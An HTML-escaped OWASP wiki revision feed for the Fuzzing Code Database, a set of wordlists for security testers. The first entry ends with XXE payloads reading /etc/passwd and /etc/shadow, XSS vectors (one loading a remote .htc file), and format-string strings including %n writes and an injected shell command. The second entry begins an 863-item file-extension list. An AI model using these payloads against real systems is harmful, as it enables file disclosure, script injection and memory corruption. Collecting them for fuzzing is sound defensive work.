&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80045</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80045"/>
				<updated>2010-03-17T10:18:36Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) = */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
